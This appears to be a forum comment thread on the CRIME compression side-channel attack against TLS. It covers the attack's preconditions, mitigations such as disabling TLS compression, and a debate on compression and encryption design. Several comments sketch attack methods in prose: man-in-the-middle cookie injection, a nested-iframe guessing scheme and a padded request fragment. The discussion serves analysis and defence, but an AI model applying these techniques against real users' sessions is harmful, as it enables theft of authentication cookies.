I guess this is actually an instance where those Hollywood "guess the password one character at a time" animations would make sense.
1. To know the format of cookies used for the web site you are targetting. Specifically, whatever cookie contains authentication.
3. Ability to monitor the SSL connection is it is transported across TCP.
Would have been fun if they called this the CPE1704TKS attack instead of CRIME: http://www.youtube.com/watch?v=NHWjlCaIrQo
Like AWS. (Cite: http://dl.acm.org/citation.cfm?id=1653687.)
 Lala people never send sensitive data over plain HTTP I'M NOT HEARING YOU.
I understand and agree with your comment about the secure flag, but if I understood ivanr's comment it doesn't apply.
As for manipulating cookies from the MITM perspective, here's one clunky way to do it: redirect the victim's browser to the plain-text version of the target web site, intercept that request, and set a new cookie (pretending to be the plain-text version of the target web site). The next request to the secure version of the target web site should contain the injected cookie. As tptacek mentioned in another comment, this approach would not work with a site that uses HTTP Strict Transport Security.
I think all three comments in this little subthread might be saying the same thing. Go nerddom!
That one was not cracked one character at a time in series, portions in the middle were discovered sooner. But, yeah, would have been a more appropriate, cooler name.
edit: tptacek is absolutely right; there isn't a way to defend against this in application code. All you can do is turn off TLS compression. This is NOT by any means the only approach, it's just the most obvious one.
Did you see the BEAST attack? Exactly one byte at a time: http://www.youtube.com/watch?v=BTqAIDVUvrU
You're right that Hollywood "guess the password one character at a time" animation makes sense here. It also makes sense for timing based attacks. Ie, if checking "AB" against the password takes longer than "A", you know the second character is B...
1. Attacker controls some parts of plaintext
2. Attacker's content is mixed with content attacker wants to discover
3. Attacker can make repeated trials against the same plaintext (not against same ciphertext stream or key)
4. Defender compresses content on the fly
There are probably other cryptosystems that have this flaw, but it's less inherent to TLS than it is to the HTTPS security model.
Variable time until some threshold number of repeat failures occurs (e.g. 3). After this, manipulate the comparison time in such a manner that someone attempting to do this sort of attack would come up with a dummy password. If they come up with said dummy password, alert the user of an attempted attack.
So I suspect the attack there cannot work on TLS, and in fact the demo code posted in a comment attacks local zlib, not TLS.
I think the actual attack, if it's along these lines, involves getting the server to echo back your guess of the cookie, so that the cookie and your guess are both on the same stream. Perhaps with TRACE?
Edit: Wait, I am. That wouldn't work because it'd compress the repeated subsequences. D'oh.
At least we can still do compression at the HTTP (or other higher-level protocol) level. That gets us most of the benefit anyway.
What would be the procedure if you use bzip2 (which is based on Burrows-Wheeler transformation) compression?
I do a lot of experimentation with new compression techniques for web demos, and I recently implemented my own compression algo from scratch based around the same building blocks as bzip2. The variance I saw was just staggering; a tiny change in my source material would totally warp the output.
Seriously, we know how to build secure cryptographic protocols. Unfortunately, step #1 is "don't try to be backwards compatible with the horribly broken things people were doing in the 1990s".
(Reason: because encrypted data is [should be] indistinguishable from random data, and random data does not compress)
These days, even when we don't include cryptographic fingerprints (e.g., with the hash-and-encrypt construction C = E(M || H(M)) ) there's enough structure in compression format headers to allow an attacker to recognize if he has the right key... and he isn't going to be running a brute-force attack anyway.
When authenticating messages, a receiver necessarily gains the ability to reject a message as invalid. Adaptive chosen plaintext attacks arise when this rejection ends up containing more information than a simple Y/N. From the perspective of an attacker, the verifier becomes an oracle capable of answering say "How many bytes are valid", leading to a sub-brute-force attack.
It's easy for me to believe that you've internalized "minimize data-dependent branches in crypto code" and thus wouldn't have designed a compressed encrypted transport.
It is very hard for me to believe that you would have spotted this flaw immediately had anyone pointed out to you that TLS supported compression.
There is well-regarded (though not by me) crypto advice recommending that people compress before encrypting, to destroy structure in the plaintext.
"... both the SSH and TLS protocols support an option for on-the-fly compression. Potential security implications of using compression algorithms are of practical importance to people designing systems that might use both compression
I'm not claiming that I'd have noticed this particular attack. I'm saying that having compression in a supposedly secure transport layer was an obviously bad idea even before it was clear how it could be exploited. I don't need to get into a car accident to know that driving at night with my car's headlights turned off is a bad idea.
There's a huge difference between compressing data and compressing an authentication channel. This is why compression should not be included in the secure channel -- it should be left up to the higher-level code to decide if compression is (a) completely pointless or (b) will leak information dangerously.
But compression in TLS is not a relic of the 1990s; it's something that looks to have gained its earliest adoption in SSL/TLS at about the same time as Elliptic Curve.
My issue here isn't that you're wrong; it's that I think this is an extremely clever attack that says something profound about designing cryptosystems, and I wouldn't want to see Thai's and Juliano's (or Pornin's, if he's "wrong" about the prediction) work minimized by a glib comment about TLS.
I guess by that point they had thrown in everything but the kitchen sink, and decided they might as well throw in the kitchen sink too.
I wouldn't want to see Thai's and Juliano's (or Pornin's, if he's "wrong" about the prediction) work minimized by a glib comment about TLS.
Oh, of course. I'm just irritated (as usual) by the fact that people continue to use SSL/TLS "because it's the standard" despite the fact that it's a phenomenally broken standard. There's places where you can't avoid it (HTTPS), but where it can be avoided...
My perspective on HTTPS/TLS is that it has a history of vulnerabilities because it is the most carefully studied cryptosystem in human history.
I agree to disagree with you on this.
Your perspective is... I'm not quite sure, actually. Maybe you just don't believe in mathematical proofs?
As you say, agree to disagree -- but I'm not going to stop pointing and laughing every time a new SSL/TLS vulnerability comes out. :-)
There's a reason why I don't drink -- type 1 diabetes and large quantities of alcohol don't interoperate well.
I work in an area where bugs are very scary, so we use formal verification, and that's on top of having many more testers than developers.
From the perspective of this naive outsider, I'd would have expected FV to be worth it for security sensitive protocols. Is it that the protocols are too complex to be verified, or is it just not considered to be worth the effort?
Colin is right that we know how to prove that cryptographic systems have certain security properties. The academic literature is filled with laments about TLS and proofs of fixed versions of it.
Also, how does one compare a cryptographic hash function core to an entire cryptographic protocol to produce a statement about the fallibility of crypto design?
(Even if HTTP probably just got lucky here rather than deliberately making the right choice, it's still the only layer that had the chance to make the right choice).
Compression before encryption is not a problem if the sender is the only person that decides what is in the message to be sent. Compression doesn't make it vulnerable to chosen plain-text attacks either. Mixing victims's and attacker's data before compression and encryption will leak data, yes.
In theory, protocols which fall to attacks when attackers have control of some of the message are said to be vulnerable to "chosen plaintext attacks" (if the attacker only gets 1 shot per message) or "adaptive chosen plaintext attacks" (if the attacker gets many bites at the same apple). Sound protocols don't have feasible adaptive chosen plaintext attacks.
In practice, most protocols can be coerced into carrying some data controlled by attackers. Sneaking some attacker-controlled data into a message is a very low bar for an attacker to clear.
A conceptual purist like Colin Percival would argue, correctly, that if there's an attack against a cryptosystem that benefits from knowing the distribution of bytes in the plaintext, that's a damning statement about the cryptosystem itself.
But compression does "break" some exploits.
I've studied cryptography theory, and I've implemented various ciphers and attacks, and the more I learn the more certain I become that I would never, ever use any of my own crypto code in production.
Data compression is often used in data storage or transmission. Suppose you want to
use data compression in conjunction with encryption. Does it make more sense to
A. Compress the data and then encrypt the result, or
B. Encrypt the data and then compress the result.
Now we know the correct answer is Neither.
For a confusing example of a fairly leaky cryptosystem involving compression that works well in practice and has a proof of security that is aware of the leak, see Douceur et al.'s "convergent encryption".
Disabling compression could certainly contribute to global warming in a relatively small way...
GET / HTTP/1.0
X-Pad: GET / HTTP/aaaaaaa
You could argue that given enough samples the noise could be filtered and the attack still remains, but the same could be said the same for many successful patches over the years (TCP sequence number randomization, Kaminsky's DNS issue, etc.), and the number of samples required would be pretty infeasible.
Even if you don't have direct access to the library code creating SSL objects, there are still some tricks with ctypes, ffi, dlopen that have the same effect.
It might even work with JacaScript turned. Have a page with nested iframes. Serve each one from a different IP address and have the server not answer right away. The server answers with the first iframe having a chosen URL while Eve snoops the wire. Eve tells the server which URL to use for the next iframe body that it sends. Repeat until the cookie is deduced. The server can use a nested tree of iframes to avoid having a bazillion iframes in the top level document.
If not, we’ll urgently need a way for site devs to whitelist precomputed (and thus immune) static assets for compression.
Compression: Specifies whether compression is allowed, or delayed until the user has authenticated successfully. The argument must be "yes", "delayed", or "no". The default is "delayed".
I don't know why they chose "delayed" as default, but this seems to prevent this attack.
So, not so much.